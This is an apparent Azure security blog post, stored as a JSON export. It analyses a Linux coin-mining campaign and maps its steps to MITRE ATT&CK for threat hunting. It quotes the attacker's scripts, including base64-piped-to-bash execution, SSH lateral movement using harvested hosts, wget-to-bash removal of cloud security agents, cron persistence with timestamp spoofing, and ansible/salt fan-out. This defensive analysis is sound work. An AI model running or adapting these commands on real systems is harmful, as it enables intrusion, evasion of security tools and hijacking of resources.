{"id":805,"date":"2020-01-14T00:00:00","date_gmt":"2020-01-14T00:00:00","guid":{"rendered":"https:\/\/azure.microsoft.com\/blog\/learning-from-cryptocurrency-mining-attack-scripts-on-linux"},"modified":"2025-06-29T10:54:08","modified_gmt":"2025-06-29T17:54:08","slug":"learning-from-cryptocurrency-mining-attack-scripts-on-linux","status":"publish","type":"post","link":"https:\/\/azure.microsoft.com\/en-us\/blog\/learning-from-cryptocurrency-mining-attack-scripts-on-linux\/","title":{"rendered":"Learning from cryptocurrency mining attack scripts on Linux"},"content":{"rendered":"\n

Cryptocurrency mining attacks continue to represent a threat to many of our Azure Linux customers. In the past<\/a>, we’ve talked about how some attackers use brute force techniques to guess account names and passwords and use those to gain access to machines. Today, we’re talking about an attack that a few of our customers have seen where a service is exploited to run the attackers code directly on the machine hosting the service.<\/p>\n\n\n\n

This attack is interesting for several reasons. The attacker echoes in their scripts so we can see what they want to do, not just what executes on the machine. The scripts cover a wide range of possible services to exploit so they demonstrate how far the campaign can reach. Finally, because we have the scripts themselves, we can pull out good examples from the Lateral Movement, Defense Evasion, Persistence, and Objectives sections of the Linux MITRE ATT&CK Matrix<\/a> and use those to talk about hunting on your own data.<\/p>\n\n\n\n

Initial vector<\/h2>\n\n\n\n

For this attack, the first indication something is wrong in the audited logs is an echo command piping a base64 encoded command into base64 for decoding then piping into bash. Across our users, this first command has a parent process of an application or service exposed to the internet and the command is run by the user account associated with that process. This indicates the application or service itself was exploited in order to run the commands. While some of these accounts are specific to a customer, we also see common accounts like Ubuntu, Jenkins, and Hadoop being used. <\/p>\n\n\n

\n\/bin\/sh -c \"echo ZXhlYyAmPi9kZXYvbnVsbApleHBvcnQgUEFUSD0kUEFUSDovYmluOi9zYm\n<\/pre><\/div>\n\n
\nluOi91c3IvYmluOi91c3Ivc2JpbjovdXNyL2xvY2FsL2JpbjovdXNyL2xvY2FsL3NiaW4KCmRvbm\n<\/pre><\/div>\n\n
\nUK|base64 -d|bash\"\n<\/pre><\/div>\n\n\n
Scripts<\/h2>\n\n\n\n
It is worth taking a brief aside to talk about how this attacker uses scripts. In this case, they do nearly everything through base64 encoded scripts. One of the interesting things about those scripts is they start with the same first two lines: redirecting both the standard error and standard output stream to \/dev\/null<\/code> and setting the path variable to locations the attacker knows generally hold the system commands they want to run. <\/p>\n\n\n
\nexec &>\/dev\/null\n\nexport PATH=$PATH:\/bin:\/sbin:\/usr\/bin:\/usr\/sbin:\/usr\/local\/bin:\/usr\/local\/sbin\n<\/pre><\/div>\n\n\n
This indicates that when each of them is base64 encoded, the first part of the encoding is the same every time.<\/p>\n\n\n
\nZXhlYyAmPi9kZXYvbnVsbApleHBvcnQgUEFUSD0kUEFUSDovYmluOi9zYmluOi91c3IvYm\n<\/pre><\/div>\n\n
\nluOi91c3Ivc2JpbjovdXNyL2xvY2FsL2JpbjovdXNyL2xvY2FsL3NiaW4K\n<\/pre><\/div>\n\n\n
The use of the same command is particularly helpful when trying to tie attacks together across a large set of machines. The scripts themselves are also interesting because we can see what the attacker intended to run. As defenders, it can be very valuable to look at attacker scripts whenever you can so you can see how they are trying to manipulate systems. For instance, this attacker uses a for loop to cycle through different possible domain names. This type of insight gives defenders more data to pivot on during an investigation.<\/p>\n\n\n
\nfor h in onion.glass civiclink.network tor2web.io onion.sh onion.mn onion.in.net onion.to\ndo\nif ! ls \/proc\/$(cat \/tmp\/.X11-unix\/01)\/io; then\nx tv.$h\nelse\nbreak\nfi\ndone\n<\/pre><\/div>\n\n\n
We observed this attacker use over thirty different encoded scripts across a number of customers, but they boiled down to roughly a dozen basic scripts with small differences in executable names or download sites. Within those scripts are some interesting examples that we can tie directly to the MITRE ATT&CK Matrix for Linux.<\/p>\n\n\n\n
Lateral Movement<\/h2>\n\n\n\n
While it isn\u2019t the first thing the attacker does, they do use an interesting combination Discovery (T1018: Remote System Discovery<\/a>) and Lateral Movement (T1021: Remote Services<\/a>) techniques to infect other hosts. They grep through the files .bash_history, \/etc\/hosts<\/code>, and .ssh\/known_hosts<\/code> looking for IP addresses. They then attempt to pass their initial encoded script into each host using both the root account and the account they compromised on their current host without a password. Note, the xssh<\/code> function appears before the call in the original script. <\/p>\n\n\n
\nhosts=$(grep -oE \"b([0-9]{1,3}.){3}[0-9]{1,3}b\" ~\/.bash_history \/etc\/hosts ~\/.ssh\/known_hosts |awk -F: {'print $2'}|sort|uniq ;awk {'print $1'} $HOME\/.ssh\/known_hosts|sort|uniq|grep -v =|sort|uniq)\n\nfor h in $hosts;do xssh root $h; xssh $USER $h & done\n\n------\n\nxssh() {\n\nssh -oBatchMode=yes -oConnectTimeout=5 -oPasswordAuthentication=no -oPubkeyAuthentication=yes -oStrictHostKeyChecking=no $1@$2 'echo ZXhlYyAKZG9uZQo=|base64 -d|bash'\n\n}\n<\/pre><\/div>\n\n\n
In each case, after the initial foothold is gained, the attacker uses a similar set of Defense Evasion techniques.<\/p>\n\n\n\n
Defense Evasion<\/h2>\n\n\n\n
Over various scripts, the attacker uses the T1107: File Deletion<\/a>, T1222: File and Directory Permissions Modification<\/a>, and T1089: Disabling Security Tools<\/a> techniques, as well as the obvious by this point, T1064: Scripting<\/a>.<\/p>\n\n\n\n
In one script they first they make a randomly named file:<\/p>\n\n\n
\nz=.\/$(date|md5sum|cut -f1 -d\" \")\n<\/pre><\/div>\n\n\n
After they download their executable into that file, they modify the downloaded file for execution, run it, then delete the file from disk:<\/p>\n\n\n
\nchmod +x $z;$z;rm -f\n<\/pre><\/div>\n\n\n
In another script, the attacker tries to download then run uninstall files for the Alibaba Cloud Security Server Guard and the AliCloud CloudMonitor service (the variable $w is set as a wget command earlier in the script).<\/p>\n\n\n
\n$w update.aegis.aliyun.com\/download\/uninstall.sh|bash\n\n$w update.aegis.aliyun.com\/download\/quartz_uninstall.sh|bash\n\n\/usr\/local\/qcloud\/stargate\/admin\/uninstall.sh\n<\/pre><\/div>\n\n\n
Persistence<\/h2>\n\n\n\n
Once the coin miner is up and running, this attacker uses a combination of T1168: Local Job Scheduling<\/a> and T1501: Systemd Service<\/a> scheduled tasks for persistence. The below is taken from another part of a script where they echo an ntp call and one of their base64 encoded scripts into the file systemd-ntpdate then add a cron job to run that file. The encoded script here is basically the same as their original script that started off the intrusion.<\/p>\n\n\n
\necho -e \"#x21\/bin\/bashnexec &>\/dev\/nullnntpdate ntp.aliyun.comnsleep $((RANDOM % 600))necho ZXhlYyAmPi92gKZmkK|base64 -d|bash\" > \/lib\/systemd\/systemd-ntpdate\n\necho \"0 * * * * root \/lib\/systemd\/systemd-ntpdate\" > \/etc\/cron.d\/0systemd-ntpdate\n\ntouch -r \/bin\/grep \/lib\/systemd\/systemd-ntpdate\n\ntouch -r \/bin\/grep \/etc\/cron.d\/0systemd-ntpdate\n\nchmod +x \/lib\/systemd\/systemd-ntpdate\n<\/pre><\/div>\n\n\n
Objectives<\/h2>\n\n\n\n
As previously mentioned, the main objective of this attacker is to get a coin miner started. They do this in the very first script that is run using the T1496: Resource Hijacking<\/a> tactic. One of the interesting things about this attack is that while they start by trying to get the coin miner going with the initially compromised account, one of the subsequent scripts attempts to get it started using commands from different pieces of software (T1072: Third-party Software<\/a>).<\/p>\n\n\n
\nansible all -m shell -a 'echo ZXhuZQo=|base64 -d|bash'\n\nknife ssh 'name:*' 'echo ZXhuZQo=|base64 -d|bash'\n\nsalt '*' cmd.run 'echo ZXhZQo=|base64 -d|bash'\n<\/pre><\/div>\n\n\n
Hunting<\/h2>\n\n\n\n
ASC Linux customers should expect to see coin mining<\/a> or suspicious download alerts from this type of activity, but what if you wanted to hunt for it yourself? If you use the above script examples, there are several indicators you could follow up on, especially if you have command line logging. <\/p>\n\n\n\n